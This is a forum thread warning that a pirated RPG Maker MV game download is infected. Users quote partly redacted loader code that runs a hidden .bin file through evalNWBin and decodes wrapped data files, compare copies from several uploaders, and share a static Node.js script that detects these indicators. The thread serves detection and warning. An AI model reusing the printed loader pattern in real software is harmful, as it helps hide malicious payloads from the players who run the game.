PSA: Malware detected from member's upload

The user 'SlidingSubject' posted this on f95 about RJ01617050 ryuugames mediafire link:

So, I may have found a virus. Again.
I open the game
And then it immediately closes itself.
So, I downloaded a game. Seijo Rinaria No Rakuyo. Nothing new.
After setting up, I opened it, and then it immediately closed. That was weird.
So I decided to go into the game files. Guess what. All the files in the data folder are just a variation of this.
JSON:
{
    "uid":"short_uid_string",
    "bid":"mv_version_i_think",
    "data":"long_base64_string"
}
I already had a bit of experience with this due to a dev who hid the encryption key of his game, so while curious, I wasn't alarmed. Though that dev only hid the System.json file.
When I entered the js folder, there was a weird .bin file there. I moved on and searched the .js files, and I got lucky. There were two interesting things there. Changed a few things on the code, just in case.
JavaScript:
if (typeof window._X === 'undefined') {
    var p = require('path'); nw.Window.get().evalNWBin(null, p.join(process.cwd(), 'www', 'js', 'FILENAME.bin'));
}
JavaScript:
var fs = require('fs'), path = require('path'), FILENAME = 'obfuscated name of a .sys file on the same folder as Game.exe';
if (fs.existsSync(path.join(process.cwd(), FILENAME)) && typeof window.cDiv === 'undefined') {
    //stuff;
}
I tried to comment the first one, and then the game just got stuck loading. I uncommented the code and removed the .bin file from the js folder, and then it threw an error.
So I went on to the second one. I managed to get the name of the .sys file it was trying to check for, but it wasn't there, so I made an empty .txt file, renamed it to the .sys one, and opened the game. The results are in the spoiler up there.

I had it opened from a different thing I was doing, so I got lucky detecting this. Can anyone check exactly what this is trying to do? Here's a download link for the maybe virus, and since it's from ryuugames.com, that's the password.
https://www.virustotal.com/gui/file...7daff7fee03566e1832a985641df0c4f2ec/detection
 
I see lots of uploads for RJ01617050

Triage needed if this was modified or source
 
My post after his:
Could be malware or a very aggressive DRM (scanning for reverse engineering tools).
 
yeah they even include cheat_engine, weird huh
 
He posted more info:
Seems like only the ryuu download is infected, I just downloaded one from two different sources (from the slow ones) and it's fine.

Ran fc on non-data files (.rpgmv and .json, since the ones from the other source don't have their .json files encrypted), and everything was the same (a few extra empty bits at the end of libEGL.dll and libGLESv2.dll though), except for the rpg_managers.js file. I'll just comment on the differences showing the original script.

JavaScript:
DataManager.loadDataFile = function(name, src) {
    //virus code added a call to the .bin file
    var xhr = new XMLHttpRequest();
    var url = 'data/' + src;
    xhr.open('GET', url);
    xhr.overrideMimeType('application/json');
    xhr.onload = function() {
        if (xhr.status < 400) {
            window[name] = JSON.parse(xhr.responseText);
            DataManager.onLoad(window[name]);
            //virus replaced the above two lines for a try catch, with everything following inside the try
            //it checked for the .sys file to create a console thing
            //after which it read the base64, did bitwise operations on it based on some function from the .bin file
            //and finally it executed these two lines, the b variable is the base64 that was also modified
            //window[name] = JSON.parse(b.toString('utf8').replace(/^\uFEFF/, ''));
            //DataManager.onLoad(window[name]);
        }
    };
    xhr.onerror = this._mapLoader || function() {
        DataManager._errorUrl = DataManager._errorUrl || url;
    };
    //no idea why the virus also removed the above onerror function too
    window[name] = null;
    xhr.send();
};

Also, huh, a thread was made with the virus link, I think that should be changed, it has the corrupt script.
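
Added example (not part of the original posts, and not code from the game or the uploader): a static Node.js check of an RPG Maker MV folder for the three indicators described above, namely a .bin file in www/js, scripts that call evalNWBin, and data files in the {uid, bid, data} wrapper shape. The www/data location, the function names and the sample tree are assumptions made for the demo; a hit means the copy should be compared against a known-good one, not that it is confirmed malicious.

```javascript
// Added triage example (not the posters' code). Static checks only: nothing from the game is executed.
const fs = require('fs'), os = require('os'), path = require('path');

// A data file counts as "wrapped" if it has the {uid, bid, data} shape quoted in the post.
function isWrappedDataFile(text) {
  let obj;
  try { obj = JSON.parse(text.replace(/^\uFEFF/, '')); } catch (e) { return false; }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) return false;
  const keys = Object.keys(obj).sort().join(',');
  return keys === 'bid,data,uid' && typeof obj.data === 'string' &&
    /^[A-Za-z0-9+/]+={0,2}$/.test(obj.data);
}

// Sorted file names in dir with the given extension; a missing directory yields [].
function listFiles(dir, ext) {
  if (!fs.existsSync(dir)) return [];
  return fs.readdirSync(dir).filter(f => f.toLowerCase().endsWith(ext)).sort();
}

// Scan <gameRoot>/www for the indicators described in the thread.
function triageGame(gameRoot) {
  const www = path.join(gameRoot, 'www');
  const jsDir = path.join(www, 'js'), dataDir = path.join(www, 'data');
  const read = (d, f) => fs.readFileSync(path.join(d, f), 'utf8');
  return {
    binInJs: listFiles(jsDir, '.bin'),
    evalNWBinCallers: listFiles(jsDir, '.js').filter(f => read(jsDir, f).includes('evalNWBin')),
    wrappedData: listFiles(dataDir, '.json').filter(f => isWrappedDataFile(read(dataDir, f))),
  };
}

// Constructed sample tree; file names and contents are made up for the demo.
function buildSample() {
  const root = fs.mkdtempSync(path.join(os.tmpdir(), 'mv-triage-'));
  const js = path.join(root, 'www', 'js'), data = path.join(root, 'www', 'data');
  fs.mkdirSync(js, { recursive: true }); fs.mkdirSync(data, { recursive: true });
  fs.writeFileSync(path.join(js, 'main.js'), "nw.Window.get().evalNWBin(null, 'x.bin');");
  fs.writeFileSync(path.join(js, 'rpg_core.js'), 'function Bitmap() {}');
  fs.writeFileSync(path.join(js, 'loader.bin'), Buffer.from([0, 1, 2, 3]));
  fs.writeFileSync(path.join(data, 'System.json'),
    JSON.stringify({ uid: 'a1', bid: 'mv', data: Buffer.from('{}').toString('base64') }));
  fs.writeFileSync(path.join(data, 'Actors.json'), '[null,{"id":1,"name":"Hero"}]');
  return root;
}

const report = triageGame(buildSample());
console.log(JSON.stringify(report, null, 2));
```

To check a real download, pass its folder (the one containing Game.exe) to triageGame instead of the sample tree.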
 
oh, I got an infected game from ryuugames in the past too, their ops seems to be very similar to IGG games, people still fall for it
 
What I really don't like is how ryuugames operates, because the owner doesn't really check where the game source came from. Is it safe or not?

It was never clarified. I think ryuugames should be getting notes or something for the future, because a lot of people get infected like this.
 
Some games containing the Miner issues that arose at the beginning of the year are still on this site, so please check if you are an uploader.

[RJ01522545] IDOL CONFLICT

I have reported the files I personally verified directly to the uploader, but I have not checked files uploaded by other uploaders. I suspect they are sharing files from the same source, so I would appreciate it if you could check.

Add:
The CRC values for libEGL.dll and libGLESv2.dll matched those of the trial version, confirming that the infection occurred after actually running the .exe file.
 
I compared Ryzen111 (left), Shine (middle), Otokonoko (right), and it seems cryptbase.dll & d3dcompiler_64.dll were still in the middle & right ones, which I think were the virus DLLs before?
The only other difference is the resources.pak. The size on Shine & Otokonoko was 40753879, while for Ryzen111 it was 5245483.

As for the others I checked (ramori, nobodyknows22, UFO, Nihonjaki90), they all have cryptbase.dll too.

 
I already fixed my file. Windows Defender was updated to detect this malware, so make sure your Windows is up to date.